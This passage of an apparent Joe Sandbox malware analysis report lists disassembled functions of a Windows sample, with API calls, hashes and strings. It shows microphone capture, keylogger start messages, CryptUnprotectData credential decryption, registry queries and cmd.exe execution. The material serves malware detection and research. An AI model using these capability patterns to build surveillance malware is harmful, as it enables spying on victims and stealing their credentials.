                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                • String ID:
                                • API String ID: 313313983-0
                                • Opcode ID: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                                • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                                • Opcode Fuzzy Hash: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                                • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                                Function 00401BC9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                                • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                                • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                                • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                                • waveInStart.WINMM ref: 00401CDE
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                • String ID:
                                • API String ID: 1356121797-0
                                • Opcode ID: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
                                • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
                                • Opcode Fuzzy Hash: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
                                • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
                                Function 0044C53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                                • _free.LIBCMT ref: 0044C59F
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                                • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                                • Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                                • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                                Function 0041A17B Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
                                • WriteFile.KERNEL32(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreatePointerWrite
                                • String ID:
                                • API String ID: 1852769593-0
                                • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                                • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
                                Function 0040FBC8 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                                • int.LIBCPMT ref: 0040FBE8
                                  • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                  • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                • std::_Facet_Register.LIBCPMT ref: 0040FC28
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                • String ID:
                                • API String ID: 2536120697-0
                                • Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
                                • Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
                                Function 004457A9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
                                • _free.LIBCMT ref: 004457E3
                                • _free.LIBCMT ref: 0044580A
                                • SetLastError.KERNEL32(00000000), ref: 00445817
                                • SetLastError.KERNEL32(00000000), ref: 00445820
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
                                • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                                • Opcode Fuzzy Hash: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
                                • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
                                Function 0044DB9C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 0044DBB4
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 0044DBC6
                                • _free.LIBCMT ref: 0044DBD8
                                • _free.LIBCMT ref: 0044DBEA
                                • _free.LIBCMT ref: 0044DBFC
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
                                • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
                                Function 00441548 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00441566
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 00441578
                                • _free.LIBCMT ref: 0044158B
                                • _free.LIBCMT ref: 0044159C
                                • _free.LIBCMT ref: 004415AD
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                                • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                                Function 00412446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Enum$InfoQueryValue
                                • String ID: [regsplt]
                                • API String ID: 3554306468-4262303796
                                • Opcode ID: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                                • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                                • Opcode Fuzzy Hash: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                                • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                                Function 0044B8C9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                Download Yara Rule
                                APIs
                                • _strpbrk.LIBCMT ref: 0044B918
                                • _free.LIBCMT ref: 0044BA35
                                  • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,?,?,?,?,?,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                                  • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 00439AC7
                                  • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000), ref: 00439ACE
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                • String ID: *?$.
                                • API String ID: 2812119850-3972193922
                                • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                • Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
                                • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                • Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94
                                Function 00442B2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alloca_probe_16__freea
                                • String ID: H"G$H"GH"G
                                • API String ID: 1635606685-3036711414
                                • Opcode ID: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
                                • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
                                • Opcode Fuzzy Hash: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
                                • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
                                Function 0040184A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142threadCOMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0040189E
                                • ExitThread.KERNEL32 ref: 004018D6
                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                  • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                • String ID: 8:G
                                • API String ID: 1649129571-405301104
                                • Opcode ID: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                                • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                                • Opcode Fuzzy Hash: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                                • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                                Function 00440935 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe,00000104), ref: 00440975
                                • _free.LIBCMT ref: 00440A40
                                • _free.LIBCMT ref: 00440A4A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
                                • API String ID: 2506810119-1769797776
                                • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                                • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                                Function 00419675 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                  • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                  • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                  • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                • _wcslen.LIBCMT ref: 00419744
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                • String ID: .exe$program files (x86)\$program files\
                                • API String ID: 37874593-1203593143
                                • Opcode ID: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                                • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                                • Opcode Fuzzy Hash: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                                • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                                Function 00409203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
                                • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
                                • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
                                  • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                  • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTimewsprintf
                                • String ID: Offline Keylogger Started
                                • API String ID: 465354869-4114347211
                                • Opcode ID: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                                • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                                • Opcode Fuzzy Hash: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                                • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                                Function 00409E37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                  • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
                                • CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
                                • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTime$wsprintf
                                • String ID: Online Keylogger Started
                                • API String ID: 112202259-1258561607
                                • Opcode ID: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                                • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
                                • Opcode Fuzzy Hash: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                                • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
                                Function 00404F31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?), ref: 00404F61
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                                • CreateThread.KERNEL32(00000000,00000000,00405130,?,00000000,00000000), ref: 00404FC0
                                Strings
                                • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$EventLocalThreadTime
                                • String ID: Connection KeepAlive | Enabled | Timeout:
                                • API String ID: 2532271599-507513762
                                • Opcode ID: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                                • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
                                • Opcode Fuzzy Hash: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                                • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA
                                Function 00406071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: CryptUnprotectData$crypt32
                                • API String ID: 2574300362-2380590389
                                • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                                • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                                Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                                • CloseHandle.KERNEL32(?), ref: 004051AA
                                • SetEvent.KERNEL32(?), ref: 004051B9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandleObjectSingleWait
                                • String ID: Connection Timeout
                                • API String ID: 2055531096-499159329
                                • Opcode ID: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                                • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                                • Opcode Fuzzy Hash: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                                • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                                Function 0040D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 2005118841-1866435925
                                • Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                                • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                                • Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                                • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                                Function 004120E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                • RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: origmsc
                                • API String ID: 3677997916-68016026
                                • Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                                • Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
                                • Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                                • Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4
                                Function 00414839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: /C $cmd.exe$open
                                • API String ID: 587946157-3896048727
                                • Opcode ID: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                                • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                                • Opcode Fuzzy Hash: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                                • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
